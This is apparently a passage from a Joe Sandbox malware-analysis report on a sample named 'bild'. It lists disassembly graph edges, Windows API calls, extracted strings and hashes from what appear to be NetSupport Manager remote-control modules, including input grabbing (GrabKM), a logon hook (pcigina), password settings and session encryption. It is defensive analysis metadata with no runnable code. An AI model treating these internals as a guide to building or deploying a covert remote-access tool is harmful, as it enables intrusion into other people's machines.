1102895f-11028975 call 111646ce 2933->2939 2934->2934 2936 1102892a 2934->2936 2936->2897 2941 11028950-11028958 2938->2941 2944 11028977-1102897d 2939->2944 2945 1102898f-110289a5 call 111646ce 2939->2945 2941->2941 2943 1102895a 2941->2943 2943->2897 2946 11028980-11028988 2944->2946 2950 110289a7-110289ad 2945->2950 2951 110289bf-110289d5 call 111646ce 2945->2951 2946->2946 2948 1102898a 2946->2948 2948->2897 2952 110289b0-110289b8 2950->2952 2956 110289d7-110289dd 2951->2956 2957 110289ef-11028a05 call 111646ce 2951->2957 2952->2952 2954 110289ba 2952->2954 2954->2897 2959 110289e0-110289e8 2956->2959 2962 11028a07-11028a0d 2957->2962 2963 11028a1f-11028a35 call 111646ce 2957->2963 2959->2959 2960 110289ea 2959->2960 2960->2897 2964 11028a10-11028a18 2962->2964 2968 11028a37-11028a3d 2963->2968 2969 11028a4f-11028a65 call 111646ce 2963->2969 2964->2964 2966 11028a1a 2964->2966 2966->2897 2970 11028a40-11028a48 2968->2970 2974 11028a86-11028a9c call 111646ce 2969->2974 2975 11028a67-11028a6d 2969->2975 2970->2970 2972 11028a4a 2970->2972 2972->2897 2980 11028ab3-11028ac9 call 111646ce 2974->2980 2981 11028a9e 2974->2981 2976 11028a77-11028a7f 2975->2976 2976->2976 2978 11028a81 2976->2978 2978->2897 2986 11028ae0-11028af6 call 111646ce 2980->2986 2987 11028acb 2980->2987 2982 11028aa4-11028aac 2981->2982 2982->2982 2984 11028aae 2982->2984 2984->2897 2992 11028b17-11028b2d call 111646ce 2986->2992 2993 11028af8-11028afe 2986->2993 2989 11028ad1-11028ad9 2987->2989 2989->2989 2991 11028adb 2989->2991 2991->2897 2998 11028b4f-11028b65 call 111646ce 2992->2998 2999 11028b2f-11028b3f 2992->2999 2994 11028b08-11028b10 2993->2994 2994->2994 2996 11028b12 2994->2996 2996->2897 3004 11028b67-11028b6d 2998->3004 3005 11028b7c-11028b92 call 111646ce 2998->3005 3000 11028b40-11028b48 2999->3000 3000->3000 3002 11028b4a 3000->3002 3002->2897 3007 11028b70-11028b78 3004->3007 3005->2897 3010 11028b94-11028b9a 3005->3010 3007->3007 3008 11028b7a 3007->3008 3008->2897 3011 11028ba4-11028bac 3010->3011 3011->2897 3011->3011
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6F951370,?,0000001A), ref: 110286DD
                                                                                                      • _strrchr.LIBCMT ref: 110286EC
                                                                                                        • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FileModuleName__stricmp_l_strrchr
                                                                                                      • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                                      • API String ID: 1609618855-357498123
                                                                                                      • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                                      • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                                      • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                                      • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 6C766BD5
                                                                                                      • GetTickCount.KERNEL32 ref: 6C766C26
                                                                                                      • Sleep.KERNEL32(00000064), ref: 6C766C5B
                                                                                                        • Part of subcall function 6C766940: GetTickCount.KERNEL32 ref: 6C766950
                                                                                                      • WaitForSingleObject.KERNEL32(00000310,?), ref: 6C766C7C
                                                                                                      • _memmove.LIBCMT ref: 6C766C93
                                                                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 6C766CB4
                                                                                                      • Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 6C766CD9
                                                                                                      • GetTickCount.KERNEL32 ref: 6C766CEC
                                                                                                      • _calloc.LIBCMT ref: 6C766D76
                                                                                                      • GetTickCount.KERNEL32 ref: 6C766DF3
                                                                                                      • InterlockedExchange.KERNEL32(02F52F72,00000000), ref: 6C766E01
                                                                                                      • _calloc.LIBCMT ref: 6C766E33
                                                                                                      • _memmove.LIBCMT ref: 6C766E47
                                                                                                      • InterlockedDecrement.KERNEL32(02F52F1A), ref: 6C766EC3
                                                                                                      • SetEvent.KERNEL32(0000030C), ref: 6C766ECF
                                                                                                      • _memmove.LIBCMT ref: 6C766EF4
                                                                                                      • GetTickCount.KERNEL32 ref: 6C766F4F
                                                                                                      • InterlockedExchange.KERNEL32(02F52EBA,-6C79A188), ref: 6C766F60
                                                                                                      Strings
                                                                                                      • ResumeTimeout, xrefs: 6C766BBA
                                                                                                      • ReadMessage returned FALSE. Terminating connection, xrefs: 6C766F3A
                                                                                                      • FALSE, xrefs: 6C766E67
                                                                                                      • ProcessMessage returned FALSE. Terminating connection, xrefs: 6C766F25
                                                                                                      • httprecv, xrefs: 6C766BDD
                                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C766E62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
                                                                                                      • String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
                                                                                                      • API String ID: 1449423504-919941520
                                                                                                      • Opcode ID: cc703fe309a1070e41654910ae53d5bc46aa27be86bdcb53225cb310e333203d
                                                                                                      • Instruction ID: 655f571aac413a0741778f209c9228b45e310721a23eab54b0a8e0438eacb98a
                                                                                                      • Opcode Fuzzy Hash: cc703fe309a1070e41654910ae53d5bc46aa27be86bdcb53225cb310e333203d
                                                                                                      • Instruction Fuzzy Hash: 6EB1A4B1D002549BDF20DF25CE48BD9B7B4EB49348F4041AAE949E7A40D7B4ABC5CF91
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                                      • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                                      • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                                      • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                                      • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                                      • API String ID: 2201880244-3035937465
                                                                                                      • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                                      • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                                      • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                                      • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50
                                                                                                      APIs
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                      • API String ID: 3535843008-2062829784
                                                                                                      • Opcode ID: d57b2f7d390a2548c1a404b3922d606782abb187a8979f341b8c48ed45959037
                                                                                                      • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                                      • Opcode Fuzzy Hash: d57b2f7d390a2548c1a404b3922d606782abb187a8979f341b8c48ed45959037
                                                                                                      • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51
                                                                                                      APIs
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                      • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                                      • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                                      • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                                      • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                                      • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                                      • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                                      • _strncpy.LIBCMT ref: 11074B68
                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                                      • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                                      • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                                      • std::exception::exception.LIBCMT ref: 11074D68
                                                                                                      • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                                      • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                                      • API String ID: 703120326-1497550179
                                                                                                      • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                                      • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                                      • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                                      • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65
                                                                                                      APIs
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                      • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                                      • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                                      • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                                      • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                                        • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                                        • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                                        • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                                        • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                                      • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                                      • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                                      • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                                        • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                                        • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                                        • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                                        • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                                        • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                                      • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                                      • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                                      • API String ID: 3930710499-403456261
                                                                                                      • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                                      • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                                      • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                                      • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11
                                                                                                      APIs
                                                                                                        • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                                        • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                        • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                        • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                      • PostMessageA.USER32(00020456,000006CF,00000007,00000000), ref: 11138E0F
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                      • SetWindowTextA.USER32(00020456,00000000), ref: 11138EB7
                                                                                                      • IsWindowVisible.USER32(00020456), ref: 11138F7C
                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                                      • IsWindowVisible.USER32(00020456), ref: 11138FAA
                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                                      • EnableWindow.USER32(00020456,00000001), ref: 11138FE7
                                                                                                      • IsWindowVisible.USER32(00020456), ref: 11139038
                                                                                                      • IsWindowVisible.USER32(00020456), ref: 11139045
                                                                                                      • EnableWindow.USER32(00020456,00000000), ref: 11139059
                                                                                                      • EnableWindow.USER32(00020456,00000000), ref: 11138FBF
                                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(00020456,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                                      • EnableWindow.USER32(00020456,00000001), ref: 1113906D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                      • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                      • API String ID: 3453649892-3803836183
                                                                                                      • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                                      • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                                      • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                                      • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
